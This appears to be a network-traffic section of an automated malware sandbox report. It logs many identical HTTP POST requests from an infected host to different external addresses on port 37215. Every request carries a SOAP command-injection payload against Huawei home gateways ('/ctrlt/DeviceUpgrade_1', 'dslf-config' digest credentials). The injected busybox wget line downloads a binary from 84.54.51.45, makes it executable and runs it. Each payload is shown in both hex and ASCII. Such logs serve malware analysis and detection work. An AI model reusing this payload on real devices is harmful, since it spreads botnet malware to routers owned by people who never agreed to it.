2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1131192.168.2.153800841.26.14.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174257994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1132192.168.2.155680241.165.59.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174272060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1133192.168.2.153765241.145.214.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174284935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1134192.168.2.154954441.170.214.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174313068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1135192.168.2.155508441.39.15.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174324036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1136192.168.2.154690041.103.209.2837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174355030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1137192.168.2.154257241.249.157.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174386978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1138192.168.2.154190041.213.244.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174442053 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1139192.168.2.153884641.186.215.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174464941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1140192.168.2.153681041.239.104.7537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174473047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1141192.168.2.153873041.162.215.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174488068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
